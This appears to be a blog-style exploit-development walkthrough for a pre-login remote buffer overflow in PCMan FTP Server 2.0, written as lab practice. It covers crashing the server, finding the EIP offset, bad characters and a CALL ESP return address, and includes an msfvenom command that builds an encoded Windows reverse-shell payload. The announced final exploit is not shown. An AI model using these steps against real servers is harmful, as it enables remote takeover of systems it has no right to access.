PCMan FTP Server 2.0 — Remote Buffer Overflow without login
“As a practice for me to test my knowledge of exploitation, I decided to find a vulnerable version of programs that has exploits in exploit-db and find another way to exploit it.”
Assalamu-Alikum, Welcome back again, yes, it’s different now, besides of my experience of Web Pentesting and Malware Analysis, now, I can exploit any BOF vulnerability with bypassing ASLR DEP for Windows Platform.
[This is not a pure article, it’s just for finding other from another exploit]
I’ll not explain What’s BOF vuln and how to exploit it in Windows, which is more difficult and challenging to Linux, you can find it on the Internet for free, but here, I’m going to teach you how to find your own exploit. [resources at the end of the article]
Now, you learned the BOF vuln and need to find your own exploit, How?
for me, I went to exploit-db website, searched for “Overflow” and found the vuln program which called “PCMan FTP Server version 2.0”, Waqas Ahmed Faroouqi has found a remote BOF vuln at “pwd” command.
And if we see it, we found that the exploit is very simple and must be logged in to succeed exploiting the vuln, so, let’s try to find the exploit without login :))))))), can we?
Let’s test all things in our own lab, download the vuln software, setup it in your own Windows vm, open your own other Linux vm [ or any testing lab you want]
First, Understand the behavior of the program without testing:
Ok, let’s build our script to connect to the server:
import socket
host="" #the vulerable remote host
buf = b"test"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
Ok, now, let’s test and make some noisy:
but, First, attach the FTP server to your debugger:
Wow, it just a random :)))))
We successfully crashing the software, I just made the number 5000 randomly :))))
Ok, we found our first exploit: PCMan FTP Server 2.0 — Danial Of Service without login.
let’s reproduce it to make a successfully buffer overflow vulnerability.
Finding the location of the EIP, then find JMP ESP, then make your reverse shellcode, but we forgot something.
$/usr/share/metasploit-framework/tools/exploit/pattern_create -l 5000
After sending the pattern to the server, we find the EIP has that:
W found the EIP in 2007 location which the same to the exploit in the exploit-db website:
so, If we copy -paste that code and change the size the return address, it should be work in our case, but let me make it by myself.
Let’s sure we control the EIP:
Let’s find the badchars:
The second bad char we found is “\x0a”, as you can see in the figure, it seems to be \x00 not \x0a, let’s remove it and send again.
The third bad char is “\x0d” as expected, “\x00, \x0a, \x0d” is the bad chars for the web servers and sometimes for ftp servers.
After removing the bad chars and send the exploit again, we didn’t see any bad char again:
Which the same result here:
we are in the right route
Let’s find the JMP ESP be mona, but first, we need to know the modules:
we have 2 modules that can bypass ASLR, DEP protections and the program executable itself.
but we didn’t find any return to ESP for those:
Only at the executable server itself, which all the addresses have the “\x00” bad char as expected, that’s why we not prefere to use the executable addresses in our exploit:
That’s why the researcher using the Windows DLL -USER32.dll- as a module for the return address.
That’s a problem guys, in real world, you can’t hack the victim by this solution because Windows DLLs is rebase which mean the address base of their executable is changeable every restarting the machine.
Your exploit is not reliable, we need a solution for it!! Comment now
So, searching for “call ESP” at “USER32.dll” and then put the address of that call as the return address of the EIP, then create the shellcode as usual from Metasploit and start your listener:
$msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=1337 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
And we receiving the shell successfully:
Now, our final exploit is here: